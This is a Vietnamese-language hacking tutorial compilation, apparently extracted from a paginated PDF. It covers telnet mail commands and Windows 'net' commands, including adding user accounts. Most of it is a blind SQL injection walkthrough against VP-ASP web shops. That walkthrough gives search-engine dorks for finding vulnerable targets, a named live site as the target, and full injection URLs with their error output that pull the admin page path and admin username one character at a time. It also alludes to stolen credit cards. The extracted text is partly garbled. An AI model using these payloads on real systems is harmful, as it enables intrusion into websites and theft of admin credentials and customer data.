Mỗi tài khoản accounts sử dụng Windows sẽ có những thông số nhất định để hiển thị các thông số này các bạn gõ: net accounts.. Để biết máy bằng hữu đang có những server nào bằng hữu gõ: n
Trang 1Nhập mật mã: PASS mật mã hộp thư Ví dụ: PASS 123456
Đọc thư : retr số thứ tự của thư Ví dụ: Retr 1
Đọc số dòng nhất định: top số thứ tự của thư số dòng Ví dụ: top 1 10 (sẽ liệt kê
10 dòng đầu của thư thứ nhất)
Xóa thư : dele số thứ tự của thư Ví dụ: dele 2 (xóa thư thứ hai)
Thoát : gõ quit
Để gửi thư :
Gõ : telnet tên mail server 25 Ví dụ: telnet smtp mail.ru25
Kết nối: helo tên mail server Ví dụ: helo mail.ru
Người gửi: mail from địa chỉ người gửi Ví dụ: mail from dplt@yahoo.com Người nhận: rcpt to địa chỉ người nhận Ví dụ: rcpt to dplt@mail.ru
Nhập nội dung: data nội dung
Kết thúc: gõ dấu chấm
Thoát : gõ quit
Mỗi tài khoản (accounts) sử dụng Windows sẽ có những thông số nhất định để hiển thị các thông số này các bạn gõ: net accounts
Để biết máy bằng hữu đang có những server nào bằng hữu gõ: net config server
Để biết các thông số về trạm làm việc (workstation) của bằng hữu, gõ: net config workstation
Để lấy danh sách các nhóm người sử dụng tại máy của bằng hữu, gõ: net
localgroup
Để lấy danh sách các tài khoản người sử dụng máy của bằng hữu, gõ: net user
Trang 2Gõ net user tên_người_sử_dụng mật_khẩu /add sẽ thêm người sử dụng vào máy của bằng hữu Ví dụ: net user dplt 123456 /add
Gõ net user tên_người_sử_dụng mật_khẩu /delete sẽ xóa người sử dụng máy của bằng hữu
Từ Windows 2000 trở lên có rất nhiều chương trình được chạy dưới chế độ
service, có nghĩa là chạy cho tất cả mọi người sử dụng máy (cho nhiều accounts), các service này có thể là:
ALERTER (hiển thị các thông báo)
BROWSER (trình duyệt)
CLIENT SERVICE FOR NETWARE
CLIPBOOK
DHCP CLIENT
FILE REPLICATION
MESSENGER (gửi nhận thông điệp giữa các máy)
NET LOGON
NT LM SECURITY SUPPORT PROVIDER
REMOTE ACCESS CONNECTION MANAGER
ROUTING AND REMOTE ACCESS
RPCLOCATOR
SCHEDULE
SERVER
Trang 3SPOOLER
TCP/IP NETBIOS HELPER SERVICE
UPS
WORKSTATION
Để kích hoạt một service chạy các bằng hữu gõ: net start tên_service
Ví dụ: net start MESSENGER
Để tạm dừng một service gõ: net pause tên_service
Để tiếp tục một service đang bị tạm dừng gõ: net continue tên_service
Để dừng một service bằng hữu gõ: net stop tên_service
Khi bằng hữu nối mạng (LAN hoặc Internet) việc chia sẽ tài nguyên rất quan trọng
Để quản lý các công việc đó bằng hữu có thể sử dụng các câu lệnh sau:
Gõ net session sẽ đưa ra danh sách người sử dụng nào đang sử dụng file gì trên máy nào
Gõ net view tên_máy sẽ đưa ra danh sách những gì máy chia sẻ
Ví dụ: net view dplt
Gõ net view sẽ đưa ra danh sách tất cả các chia sẻ của các máy ở xa
Gõ net file | more sẽ hiện ra danh sách những file đang được các người sử dụng
mở
Gõ net file >c:\fileopen.txt sẽ ghi lại tên các file được mở vào file fileopen.txt Windows hỗ trợ việc nhắn gửi thông điệp bằng các câu lệnh sau:
Gõ net send /domain nội_dung_thông_điệp sẽ gửi thông điệp đến tất cả các máy
Trang 4trong domain Ví dụ: net send /domain xin chao moi nguoi
Gõ net send tên_máy nội_dung_thông_điệp sẽ gửi thông điệp đến máy xác định
Ví dụ: net send dplt xinchao Hoặc net send 192.168.0.2 xinchao Với 192.168.0.2
là địa chỉ IP của máy cần gửi đến
Trên đây là một số câu lệnh cơ bản về NET trong Windows Để có thêm thông tin
vể câu lệnh net bằng hữu có thể gõ: net help, về ping gõ: ping /help, về Telnet gõ telnet /help
(sưu tầm)
SQL Blind
Xin giới thiệu sơ qua SQL Blind :
• Đây là hình thức khai thác dựa vào lỗ hổng bảo mật của MSSQL, dựa vào lỗ hổng này chúng ta áp dụng những đoạn mã để khai thác và tìm kiếm được thông tin từ Database của Server đó SQL Blind là kiểu khai thác dò tìm từng ký tự, khi các bạn đã sử dụng đa số các thao thác kỹ thuật hack SQL khác mà không thành công thì có thể tạm nói SQL Blind này có thề khai thông những bế tắc đó, tuy nhiên bên mặt tốt luôn có mặt không tốt đó là quá trình truy vấn SQL Blind tốn rất nhiều thời gian và công sức bởi vì các bạn phải tìm từng ký tự một trong chuỗi cần tìm VD: tìm link admin thì các bạn phải tìm từng chữ trong chuỗi Database về link admin và ghép chúng lại thành 1 chuỗi Nói nhiều các bạn rối thôi làm liền cho chắc dễ hiểu
Chuẩn bị :
- Trình duyệt Web Opera, Mozila Firefor v1.3 hoặc loại khác Internet Explorer là
ok Không nên xài Internet Explorer để Hack (^|^)
- 1 ly nước và 1 cái khăn lau mặt để chữa cháy & lau mồ hôi
Mục tiêu:
- Tất cả các Phiên bản từ 5.0 trở về trước của VP-ASP (loại shop tương đối nhiều lỗi và nhiều cc chết (^|^))
- Các Tìm những Shop VP-ASP này thì có thể tham khỏa những từ khóa bên dưới dùng cho việc search trên Google, Yahoo … một site tìm kiếm bất kì nào đó
- Từ Khóa :
Trang 5+ shopdisplayproducts.asp?id
+ shopaddtocart.asp?catalogid=
- Tôi chỉ đưa ra 2 từ khóa đó bởi vì nó là những mục tiêu chính giúp 1 trang tìm kiếm có thể tìm ra được VP-ASP
Chúng ta bắt đâu hack 1 site demo nha
Mục tiêu là hxxps://circleathletics.com/ (sử dụng VP-ASP V5.0)
- đầu tiên chúng ta tìm link admin của site này
-
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(sele ct%20f ieldname%20from%20configuration%20where%20left(fie
ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Như vậy có nghĩa là từ khóa chúng ta đưa ra (a) không phải là ký tự đâu tiên trong chuỗi link admin, chúng ta chợt suy nghĩ đên link admin thường là shopadmin.asp
… thử với câu lênh sau thay chữ a = s
-
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(sele ct%20f ieldname%20from%20configuration%20where%20left(fie
ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='s')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'xadminpage' to a column of data type int
/shop/shop$db.asp, line 409
- Chính xác là chữ S là ký tự đâu tien của link admin rồi, chúng ta tiếp tục thế những chữ khác và tiếp theo
-
hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select
%20f ieldname%20from%20configuration%20where%20left(fie
ldname,10)='xadminpage'%20and%20left(fieldvalue,2) ='sh')
- Chú ý chỗ này nha (fieldvalue,2)='sh')
Trang 6- Cú tiếp tục thay tiếp vào đê tìm ra link admin Link admin kết thúc = asp nên không cần tìm xem chuỗi ký tự có bao nhiêu ký tự đâu
Tiếp theo chúng ta tìm user + pass admin
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(sele ct%20f ldusername%20from%20tbluser%20where%20admintype='s
uper'%20and%20left(fldusername,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'